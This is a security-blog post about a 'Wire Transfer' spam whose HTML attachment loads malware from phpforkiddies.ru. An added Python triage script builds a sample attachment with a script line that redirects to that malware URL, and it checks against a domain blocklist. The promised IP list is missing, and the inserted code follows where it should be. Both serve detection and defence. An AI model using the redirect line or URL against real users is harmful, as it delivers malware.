The Latest in IT Security

“Wire Transfer” spam / phpforkiddies.ru

19 Jul 2012

This spam contains an attachment leading to malware on phpforkiddies.ru:

Date:      Wed, 18 Jul 2012 01:23:20 +0300
From:      “EUNA Wood” [[email protected]]
Subject:      Fwd: Wire Transfer (75073UQ608)
Attachments:     Wire_NFED_Rejected.htm

Dear Operator,

WIRE N: FED-9058663000926019

STATUS: REJECTED

You can find details in the attached file.

The attachment in this case is called Wire_NFED_Rejected.htm and contains a script that attempts to load malware from [donotclick]phpforkiddies.ru:8080/forum/showthread.php?page=5fa58bce769e5c2c (report here) which is multihomed on the following IPs:

The following IPs and domains are connected and should be blocked:
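A mail-gateway triage check for the lure described above, as an added example that is not part of the original post. The sample message is constructed (its `page=` value is made up), the reason labels are hypothetical, and the blocklist holds only the landing domain named in the post.

```python
import email
import re
from email.message import EmailMessage
from urllib.parse import urlsplit

# Landing domain named in the post; extend from your own blocklist feed.
BLOCKED_HOSTS = {"phpforkiddies.ru"}
# Shape of the landing URL quoted in the post: /forum/showthread.php?page=<16 hex>
LANDING_PATH = re.compile(r"^/forum/showthread\.php\?page=[0-9a-f]{16}$")
URL_RE = re.compile(r"https?://[^\s\"'<>)]+", re.I)

def build_sample() -> bytes:
    """Constructed message imitating the lure; the page id is a made-up value."""
    msg = EmailMessage()
    msg["Subject"] = "Fwd: Wire Transfer (75073UQ608)"
    msg.set_content("You can find details in the attached file.")
    html = ('<html><script>location.replace("http://phpforkiddies.ru:8080'
            '/forum/showthread.php?page=0123456789abcdef")</script></html>')
    msg.add_attachment(html.encode(), maintype="text", subtype="html",
                       filename="Wire_NFED_Rejected.htm")
    return msg.as_bytes()

def triage(raw: bytes) -> list[dict]:
    """Return one finding per suspicious URL found in HTML attachments."""
    findings = []
    for part in email.message_from_bytes(raw).walk():
        name = part.get_filename() or ""
        if part.get_content_disposition() != "attachment":
            continue
        if not (name.lower().endswith((".htm", ".html"))
                or part.get_content_type() == "text/html"):
            continue
        body = part.get_payload(decode=True).decode("utf-8", "replace")
        for url in URL_RE.findall(body):
            try:
                u = urlsplit(url)
                port = u.port
            except ValueError:  # malformed host or port: skip, do not crash
                continue
            reasons = []
            if (u.hostname or "").lower() in BLOCKED_HOSTS:
                reasons.append("blocked-host")
            if port not in (None, 80, 443):
                reasons.append("non-standard-port")
            if LANDING_PATH.match(f"{u.path}?{u.query}"):
                reasons.append("landing-url-shape")
            if reasons:
                findings.append({"attachment": name, "url": url, "reasons": reasons})
    return findings
```

This only sees URLs that appear in clear text in the attachment; an obfuscated script needs sandbox detonation or a deobfuscation pass before this check.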
